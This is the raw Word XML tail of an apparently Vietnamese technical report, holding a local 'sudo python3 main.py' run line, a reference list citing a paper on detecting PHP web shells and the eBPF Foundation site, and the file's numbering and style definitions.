          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://main.py" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1155CC"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>main.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1155CC"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tài liệu t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="tailieuthamkhao1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   Mariano Graziano và cộng sự. ShellBreaker: Automatically Detecting PHP-based Malicious Web Shells. Annual Computer Security Applications Conference, 2014.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Địa chỉ Website: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"https://www.sciencedirect.com/science/article/abs/pii/S0167404819301506" \t "/home/tien/Documents\\x/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.sciencedirect.com/science/article/abs/pii/S0167404819301506</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="tailieuthamkhao2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BPF Foundation. eBPF Foundation. Linux Foundation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Địa chỉ Website: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://ebpf.foundation/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://ebpf.foundation/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId8" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders>
        <w:top w:val="none" w:sz="0" w:space="0"/>
        <w:left w:val="none" w:sz="0" w:space="0"/>
        <w:bottom w:val="none" w:sz="0" w:space="0"/>
        <w:right w:val="none" w:sz="0" w:space="0"/>
      </w:pgBorders>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center"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:smallCaps/>
        <w:strike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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righ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center"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:smallCaps/>
        <w:strike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none"/>
        <w:shd w:val="clear" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="2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ASfsM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ASfsM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3"/>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v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateConten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20" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="432"/>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keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:spacing w:before="480"/>
    </w:pPr>
    <w:bookmarkStart w:id="96" w:name="_heading=h.rrdhwdvz6znz" w:colFirst="0" w:colLast="0"/>
    <w:bookmarkEnd w:id="96"/>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E703B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94AE703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967F071F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="967F071F"/>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2">
    <w:nsid w:val="A77B7FAD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A77B7FAD"/>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3">
    <w:nsid w:val="ADECB92A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="ADECB92A"/>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4">
    <w:nsid w:val="AEDEF1E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEDEF1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FAE5683"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AFAE5683"/>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6">
    <w:nsid w:val="BF9FEEE1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF9FEEE1"/>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7">
    <w:nsid w:val="BFB0D668"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BFB0D668"/>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8">
    <w:nsid w:val="CD5C5A05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD5C5A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D78FBED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DD78FBED"/>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10">
    <w:nsid w:val="DE7652BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE7652BB"/>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11">
    <w:nsid w:val="DFDF744B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DFDF744B"/>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12">
    <w:nsid w:val="EBFF9F37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBFF9F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EDEF9826"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDEF98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EDFB2C85"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EDFB2C85"/>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15">
    <w:nsid w:val="F3FFA8BA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F3FFA8BA"/>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16">
    <w:nsid w:val="F60E5E5C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F60E5E5C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17">
    <w:nsid w:val="FBFC243E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FBFC243E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18">
    <w:nsid w:val="FDF34CEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDF34C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FDFE113D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDFE11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FEFBAD60"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FEFBAD60"/>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21">
    <w:nsid w:val="FF6A15F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF6A15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9E8FD91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19E8FD91"/>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23">
    <w:nsid w:val="26CE2B36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26CE2B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D7986DE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2D7986DE"/>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25">
    <w:nsid w:val="376D85E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="376D85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ADF7A94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ADF7A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F1E1025"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F1E10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55F567DC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="55F567DC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:nsid w:val="577CD352"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="577CD352"/>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30">
    <w:nsid w:val="5BED5E51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BED5E51"/>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31">
    <w:nsid w:val="76F69EA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76F69E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6FA6ECA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76FA6E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
    <w:nsid w:val="77BE3E53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="77BE3E53"/>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34">
    <w:nsid w:val="7BBF2C54"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7BBF2C54"/>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abstractNum w:abstractNumId="35">
    <w:nsid w:val="7EBF56BF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7EBF56BF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Abyssinica SIL" w:hAnsi="Abyssinica SIL" w:cs="Abyssinica SIL"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="12"/>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169F7B76"/>
    <w:rsid w:val="1DDFC80B"/>
    <w:rsid w:val="1FBF1772"/>
    <w:rsid w:val="2FFFF9BC"/>
    <w:rsid w:val="30ED46A5"/>
    <w:rsid w:val="36F7F7E7"/>
    <w:rsid w:val="37FCCAA1"/>
    <w:rsid w:val="3E3FF238"/>
    <w:rsid w:val="3EEE6109"/>
    <w:rsid w:val="49FFF0B2"/>
    <w:rsid w:val="4BBA87C0"/>
    <w:rsid w:val="4F6F9DA8"/>
    <w:rsid w:val="5137272B"/>
    <w:rsid w:val="52DAEC7E"/>
    <w:rsid w:val="55D9141B"/>
    <w:rsid w:val="5B87ADF6"/>
    <w:rsid w:val="5FE73137"/>
    <w:rsid w:val="5FEFC825"/>
    <w:rsid w:val="5FFE8E51"/>
    <w:rsid w:val="67FF1C49"/>
    <w:rsid w:val="6B5C3F99"/>
    <w:rsid w:val="6FDAAB51"/>
    <w:rsid w:val="6FF5493F"/>
    <w:rsid w:val="71BF1207"/>
    <w:rsid w:val="75DF8344"/>
    <w:rsid w:val="7772AD3B"/>
    <w:rsid w:val="779120F0"/>
    <w:rsid w:val="7799BEF5"/>
    <w:rsid w:val="77DF2579"/>
    <w:rsid w:val="77F85BD7"/>
    <w:rsid w:val="77FF544F"/>
    <w:rsid w:val="797A8358"/>
    <w:rsid w:val="79DF9539"/>
    <w:rsid w:val="79FE8CE8"/>
    <w:rsid w:val="7AECFE36"/>
    <w:rsid w:val="7B57ABAD"/>
    <w:rsid w:val="7B8727BC"/>
    <w:rsid w:val="7BBF6B3A"/>
    <w:rsid w:val="7BDEDC98"/>
    <w:rsid w:val="7BFF544F"/>
    <w:rsid w:val="7BFFD839"/>
    <w:rsid w:val="7CD7321E"/>
    <w:rsid w:val="7DDD7E73"/>
    <w:rsid w:val="7DFCD2E2"/>
    <w:rsid w:val="7F1FC7F2"/>
    <w:rsid w:val="7FB76AD4"/>
    <w:rsid w:val="7FD2B30B"/>
    <w:rsid w:val="7FEEA7B9"/>
    <w:rsid w:val="7FFB53E7"/>
    <w:rsid w:val="7FFD013D"/>
    <w:rsid w:val="7FFECCD5"/>
    <w:rsid w:val="7FFF1482"/>
    <w:rsid w:val="94D9360F"/>
    <w:rsid w:val="A8BD2B96"/>
    <w:rsid w:val="ADF7CE38"/>
    <w:rsid w:val="AEFF0CFD"/>
    <w:rsid w:val="B1CF448E"/>
    <w:rsid w:val="B7EEB0F3"/>
    <w:rsid w:val="B98FE1DA"/>
    <w:rsid w:val="BBFBAAEB"/>
    <w:rsid w:val="BD7F10D2"/>
    <w:rsid w:val="BFB65C9F"/>
    <w:rsid w:val="BFDFE5FB"/>
    <w:rsid w:val="CCBF2B5E"/>
    <w:rsid w:val="D5F300A8"/>
    <w:rsid w:val="D7B75240"/>
    <w:rsid w:val="D7DF6212"/>
    <w:rsid w:val="D7EFBB6F"/>
    <w:rsid w:val="DB3F34AC"/>
    <w:rsid w:val="DF6B752D"/>
    <w:rsid w:val="E5D7CBA4"/>
    <w:rsid w:val="E79EDA6F"/>
    <w:rsid w:val="ED3C476B"/>
    <w:rsid w:val="EEDBFDB1"/>
    <w:rsid w:val="EF77C746"/>
    <w:rsid w:val="F37BDDDC"/>
    <w:rsid w:val="F3EF43F7"/>
    <w:rsid w:val="F5E342B9"/>
    <w:rsid w:val="F6AB1330"/>
    <w:rsid w:val="F7D71977"/>
    <w:rsid w:val="F7FCD72A"/>
    <w:rsid w:val="F97F8D8E"/>
    <w:rsid w:val="F9FF845E"/>
    <w:rsid w:val="FAF69DB8"/>
    <w:rsid w:val="FBAE0387"/>
    <w:rsid w:val="FBBB6B09"/>
    <w:rsid w:val="FBEFB9B2"/>
    <w:rsid w:val="FCEF0679"/>
    <w:rsid w:val="FD771C2F"/>
    <w:rsid w:val="FEDBDF9C"/>
    <w:rsid w:val="FF5D38F7"/>
    <w:rsid w:val="FF75DDFC"/>
    <w:rsid w:val="FF7C1906"/>
    <w:rsid w:val="FFB72096"/>
    <w:rsid w:val="FFC75AF0"/>
    <w:rsid w:val="FFCF48C8"/>
    <w:rsid w:val="FFDD27DE"/>
    <w:rsid w:val="FFDE1A31"/>
    <w:rsid w:val="FFDF8723"/>
    <w:rsid w:val="FFF9FCEF"/>
    <w:rsid w:val="FFFDB6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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cstheme="minorBidi"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="24"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="640" w:after="360"/>
      <w:ind w:left="720" w:hanging="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="25"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>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sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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character" w:styleId="11">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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basedOn w:val="8"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>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iPriority w:val="0"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:hanging="200" w:hangingChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="26"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun"/>
      <w:b/>
      <w:caps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="22">
    <w:name w:val="TableNormal"/>
    <w:uiPriority w:val="0"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="4"/>
